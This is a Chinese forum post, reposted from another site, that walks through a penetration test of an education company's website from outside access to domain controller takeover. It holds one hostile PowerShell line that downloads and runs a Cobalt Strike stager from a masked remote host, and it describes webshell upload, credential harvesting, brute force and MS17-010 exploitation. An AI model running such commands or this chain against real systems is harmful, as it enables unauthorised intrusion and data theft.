找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2109|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' d) |0 v8 }4 ] 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路7 N/ S4 S6 ?2 B9 d' A. n

7 {- E* @" f" l1 p/ h# Q

, f, O* K& x% K1 Z; S3 R% j  $ t; a) O& M0 q

- S4 X) O3 M* c6 o" R, L

8 g6 m7 l. v* Y! c6 o& H$ R4 O: H 正文 " h" V0 C! K0 v

$ r+ O$ A1 k4 S& A

; Q4 ]) V. W$ e' m  4 f3 ^* S7 M3 |8 E8 w/ F

; m( J# m! q6 T( U2 x8 S! ] V! u

, l \8 g A, O- e5 f: Y 目标:www.xxxx.com(一家教育机构)
u, E/ `# g8 P) s0 R2 V
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
8 `. P) C2 V" W+ I) ~

) ?% t% @9 @2 S4 Q7 b8 n8 [

# K6 P% {; n- g4 x: G) k) o* O vshapes= ( s% z1 u6 K% O& A

9 l2 P8 B1 }; v/ D* s

% ]. b* ~- j) I! x7 g# f: z 进行了简单的信息搜集
G3 y1 @3 K% N* s
" Z9 ~0 ^& h' @% Q
% z* W, s2 l3 x- e- c

2 z5 J3 w. M8 {1 [2 K

/ @; t8 D/ D; }' l7 V 子域名搜集 3 u1 G5 T; C! Q) o! d) P; B! s+ L8 i

4 e) [7 z2 r' ~0 J

' y3 V* e& b6 l vshapes=1 N6 b$ R; W0 \# _' S; h* R$ X

" v7 W0 B7 ] F4 s

" K& L; t! Q3 X5 m( F9 a2 B5 \ fofa找资产
' h8 `0 ^2 O! K
" g1 U5 F8 b2 `. ^
& ]( e( u0 t1 L& \/ c& m

' W* X; v) u* _/ ~

5 M* u( S. F4 \. d+ k8 F vshapes=( B$ C; O6 ?% J- f2 w

" C( d6 H5 c7 A% n" G

+ L# v# H, P9 V 一共七个资产。去重之后只有两个。
$ F) y; W6 K4 g# C. `! P
. {6 r u0 _" q: n5 N/ U
/ z$ R0 Y. K, r9 B1 B

% d _# z/ I- l6 @! `2 E

7 z- m8 d8 A( _. E 目录探测3 r3 v; B; z. E" `# |0 ^

+ V/ ^6 ^6 d3 |0 ]- k/ K- R

$ s' H1 D5 l% _5 l2 ]- [ vshapes= ) F! r h4 x6 K0 w. Y% D0 V! T

' T9 m6 t9 l* r" D1 P$ V! L

9 j4 M& ~4 q3 j0 q 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
* l, r9 n1 k) ~* ^$ l5 ~5 }
5 @5 w( f& V) ?3 u( m; Q
4 i; r/ \/ `. n- X

( p' \5 j; i: H5 m- G

5 A) D! [4 \7 \# J0 g 我又尝试了通过修改返回包来绕过登录界面 % w+ o& F! w( }3 s. C

1 I1 M j- L6 Q& [6 N! T# x/ d

# f0 M* @, t; @$ b vshapes=; a. Z2 y) t1 }( B5 v+ D

2 n; g1 K+ D+ G3 L5 y. m' w7 C

& C: u& U d9 V! S- o 还是不行,尝试注入无果$ L, J% A. b+ r+ ~% `4 B

, w; n$ O9 x" Y% ~$ t g* @

, i# b3 ^* K0 u# ^% e+ _ vshapes= , N% \# Z y+ ?

0 r7 Y) L5 U. \

' q f3 P" I+ a% }- H 不过我目录探测出了一处Spring信息泄露
6 P1 o" X! {" h
" y9 l" O& ]' a/ X9 J
5 w3 b( d. A4 x1 Z

' G* r8 Y" G: P

% E8 H9 P- E% t& H; d) ? vshapes= 4 e: V1 O/ E3 T/ N% Y& l

2 M, a$ A6 x/ d1 _) J

( m+ [9 f7 I4 Z. V9 a4 J$ ^ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 9 e- D; d6 ^: w O5 Y+ h

, \- G6 F% {+ _/ T2 Z; A

, m$ D" R: m& X% F vshapes= % m8 f1 L0 t; e W. O

/ H) S) j P5 i, I' L+ L. m7 o `. @

2 m" Y2 r" z. ]8 d 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。2 A5 G' t% x, U8 s/ q' o3 d+ u

: q8 k! P2 D' m

4 P* C& r' s2 B+ r: B vshapes= 6 t5 l3 X! J! }

0 Z' m- `; h2 m2 m) J3 S1 w

2 [/ v( Q; V1 i" N8 A2 K9 R6 T 获取有些师傅到这一步就手机抓包电脑测了。& c9 F# H8 r, A& H

" f; q: m ]: g: C2 F- _

# c5 k# V0 a9 O' {2 y Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。* S$ @0 ` D# n; r4 j

- p8 U8 H T. |

W e. Q9 y$ q( t( U 其中在一个公众号发现了小程序,可以进行注册。 5 @& |9 V: o. @

" B5 S! y4 F8 h0 f. w0 A, p: l

( \- I' [6 Z+ D0 N1 F2 W 看到了头像上传,尝试上传获取WebShell9 Q) h6 D5 v, Q: ~2 Y O8 p- c

! E. l) j/ B* Y! W' m$ B

, S/ T( _, X" C9 h# B vshapes=% W% Q+ D2 s1 _2 C2 a

4 }) Q" u+ V4 n- A/ _

1 u$ S$ U& C j* j9 l$ t& F 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问( ?* r/ \, C* ]8 l) S: D

+ c2 u' k0 z9 D, v* F' H

`! Q: c7 E: Y1 [: A) B vshapes=4 O& E( z1 ]! t& N. L3 D r

- m( o' B+ Q* M! ^3 y% `. c

! @" Y5 C, @2 D3 A$ I 然后上了大马% Z( \' f) Y9 w6 W/ v0 K4 q8 ^, `

9 W+ ~$ D6 W9 T* s9 Q

" ]$ y; k$ Y( v* N vshapes= $ V" P9 x% d* t( B, {7 p7 b% _

1 j b' Z1 e2 W8 q- d5 O

8 k% `! }+ i5 } vshapes= " }6 r3 q( l' S& t

4 }/ x! [3 Y \% `( ?" u1 J; _

T& d" J+ V; W9 U/ ?# u 通过翻找文件发现数据库账号密码 3 m& m6 I* }2 u7 e% [5 f8 G

* M# w. p5 c8 @

7 L4 H0 E: W+ K vshapes= 6 n& D2 P4 ?6 T2 S

/ S7 {6 s4 R' _# p+ B

) A$ C* N9 P6 F9 s; h3 @ --内网渗透8 E" E/ f$ D. L

) y1 c. Y: J* {: M- w u6 t# a7 i9 A- f

+ d% k- E K0 l0 v 直接通过powershell执行 cs上线 ; J$ u) c$ U9 ]7 L. g

4 u1 K! o: ^- t5 G6 S; q, w' d

5 c+ @) C9 r7 i8 C5 {( @- ~# d$ g: I powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"8 `5 B9 s$ T( ~1 r% J

) B$ y' }+ O1 e9 A% H& X, j* Q

5 |8 B8 G8 X1 p# n! P vshapes=% K) S/ Y/ G4 ^ a; X* i( C# b

B t( @: r' e" F2 v) f$ k

6 W- C3 J- H+ E) R 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破) e& \. f9 Z L. M9 G

( r! C9 [' s1 |: q9 S. ^

, W, q7 S" w8 C; H* ~7 m vshapes= g- }/ @" B$ v/ J4 g' H4 z

5 H/ d9 Q8 L, j% e

4 y; {1 K; ^% K% D- _* \- F! d 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
, l4 J; Y% Z# K( r! l4 L2 b8 l0 Y' i
+ Q( _9 X+ x1 C1 s
P; o& Q9 @( i) a# ~& b
# [9 U( |3 o! T0 x% Y% h. z. L

3 i# T) j& s3 {

! |1 Z' Y" J8 F# B: F: l2 x5 Z, y vshapes= - ] @* p0 n7 X0 |

) g4 l" E$ t6 d1 Z) |5 ]

0 `2 [- ^( I" ]) i' d9 p$ ^) o$ ? 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
' G8 y6 k: G+ \+ C
, a$ Q( V K9 N, o
* Q, c7 m9 S- R5 e) ?9 T- X X

+ Q. i4 D& e1 F: g' p

* N9 N5 d1 Q, f vshapes=" _6 ^& ?+ O. Q8 @ j" P. ?6 |7 U

) C8 C, b& j4 j" c! v i

& B: Z& Z" y% v! M% S
) q# c! N. f* i5 E7 C+ D; \
2 e! @) P2 ~0 s* ^! e
3 e, n8 O) f* t( B. \7 f5 h

4 l+ k. g% E8 u! n

+ c) Z' s% o# t! q; [' \  0 Z3 m8 X; H" b

4 ~" }" O8 w" N7 w' i6 O

- a- F. e8 y9 z3 L' ~ 小结 9 |: W5 P7 e2 @3 n" A+ W2 l

% V7 Q, E/ T u& ?5 a, B+ B( x

5 m2 t: M: L, l* ^6 C0 `- e  $ d3 {6 |2 X/ e' q% A! D W

- O7 g' h# M; I3 Q

7 \- q3 B1 ^. o' e 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!0 C5 Q0 y1 f6 i& a0 U, R! L9 i

3 f) L, v- W9 G5 {* j

0 C' J9 z e J) F& [" q  ! w7 v! s: r( L" `; y9 S

+ P+ |0 o, G) A
    . B! } U" _$ U: o0 U' {2 g
  • ( @! Z4 S4 Z: L z7 N   d- R. P) u# w0 [* o7 F
  • ) |# J/ t" g4 d/ K6 R6 N; q/ `8 {
  • % e G5 q3 z3 d3 c, |   5 H) }( j. ~/ H7 b
  • / H3 z1 v, l5 H9 o( z
3 Q% }) t8 J6 i% Q! W

& O: Z8 ^5 V4 m7 f7 L! D 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html$ }( \6 q5 R( K. K8 Y( j

+ q: r3 B) W3 v" r5 D

9 {3 ?4 X) J1 n. h( N2 z1 ?   5 k6 I) F6 K# ^2 v: l5 Y$ D3 B9 h

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表